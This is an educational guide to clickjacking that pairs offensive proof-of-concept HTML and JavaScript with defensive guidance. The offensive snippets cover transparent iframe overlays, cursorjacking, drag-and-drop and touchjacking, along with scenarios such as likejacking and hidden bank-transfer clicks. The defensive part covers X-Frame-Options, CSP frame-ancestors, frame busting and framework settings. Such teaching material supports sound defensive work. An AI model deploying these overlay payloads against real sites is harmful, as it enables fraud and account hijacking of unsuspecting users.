Clickjacking (UI Redress Attack) Comprehensive Guide

What is Clickjacking?

Clickjacking is a malicious technique where an attacker tricks a user into clicking something different from what the user perceives, potentially revealing confidential information or taking control of their computer.

Clickjacking Impact Severity:

  • Unauthorized actions performed by users
  • Account hijacking
  • Financial fraud
  • Data theft
  • Malware installation
  • Social media manipulation

Red Team Techniques (Offensive)

1. Basic Clickjacking Attacks

Transparent Overlay

<iframe src="https://vulnerable-site.com" style="opacity:0.5;position:absolute;top:0;left:0;width:100%;height:100%;"></iframe>
<button style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);z-index:1;">
  Click Me (Innocent Button)
</button>

Cursorjacking

<style>
  #fake-cursor { position: absolute; pointer-events: none; }
</style>
<img id="fake-cursor" src="cursor.png">
<script>
  document.addEventListener('mousemove', e => {
    document.getElementById('fake-cursor').style.left = (e.pageX + 15) + 'px';
    document.getElementById('fake-cursor').style.top = (e.pageY + 15) + 'px';
  });
</script>

2. Advanced Techniques

Drag-and-Drop Attacks

<div style="position:absolute;width:100%;height:100%;" 
     ondragover="event.preventDefault()" 
     ondrop="maliciousAction()">
  <iframe src="https://vulnerable-site.com/drag-sensitive-area" 
          style="opacity:0;width:100%;height:100%;"></iframe>
</div>

Touchjacking (Mobile)

<div style="position:fixed;top:0;left:0;width:100%;height:100%;">
  <iframe src="https://mobile-app.com" style="width:100%;height:100%;"></iframe>
  <div style="position:absolute;top:200px;left:100px;width:200px;height:50px;"></div>
</div>

3. Real-World Attack Scenarios

Social Media Likejacking

1. Attacker creates fake "Like" button over real content
2. User clicks what appears to be a news article
3. Actually likes/lends credibility to malicious page

Bank Transfer Hijacking

1. User logs into online banking
2. Visits malicious site with invisible banking iframe
3. Clicks on "Show funny cat" button that aligns with transfer button

4. Tools & Automation

Testing Tools

  • Burp Suite Clickbandit
  • OWASP Zap
  • ClickjackingTest

Exploitation Frameworks

  • BeEF (Browser Exploitation Framework)
  • Social Engineering Toolkit (SET)
  • Custom iframe generators

Blue Team Defenses (Defensive)

1. Frame Busting Techniques

JavaScript Frame Busting

if (top != self) {
  top.location = self.location;
}

X-Frame-Options Header

// HTTP Header
X-Frame-Options: DENY
// or
X-Frame-Options: SAMEORIGIN

2. Content Security Policy

CSP Frame Ancestors

Content-Security-Policy: frame-ancestors 'none';
// or
Content-Security-Policy: frame-ancestors 'self';

Reporting CSP Violations

Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-violation-report

3. Additional Protections

Visual Confirmation

// Add CAPTCHA or confirmation dialogs for sensitive actions
function confirmAction() {
  return confirm("Are you sure you want to perform this action?");
}

Session Timeouts

// Short session timeout for sensitive applications
session.setMaxInactiveInterval(300); // 5 minutes

4. Framework Protections

Django Protection

# settings.py
MIDDLEWARE = [
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    ...
]

Spring Security

@Configuration
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
    @Override
    protected void configure(HttpSecurity http) throws Exception {
        http.headers()
            .frameOptions()
            .sameOrigin();
    }
}

5. Monitoring & Detection

Detection Methods

  • Frame busting script failures
  • Unexpected referrer headers
  • Multiple rapid clicks from same user

Response Actions

  • Force re-authentication
  • Temporary account lock
  • User notification

Additional Resources & References

Learning Resources

Security Tools

Clickjacking Mitigation Checklist

  • Implement X-Frame-Options header (DENY or SAMEORIGIN)
  • Use Content-Security-Policy frame-ancestors directive
  • Add frame-busting JavaScript as secondary defense
  • Require confirmation for sensitive actions
  • Educate users about potential clickjacking risks
  • Regularly test your defenses against clickjacking
  • Monitor for frame-busting script failures
  • Implement short session timeouts for sensitive applications

Legal Notice

This content is provided for educational purposes only. Never test security vulnerabilities against systems without explicit permission. Unauthorized testing may violate laws.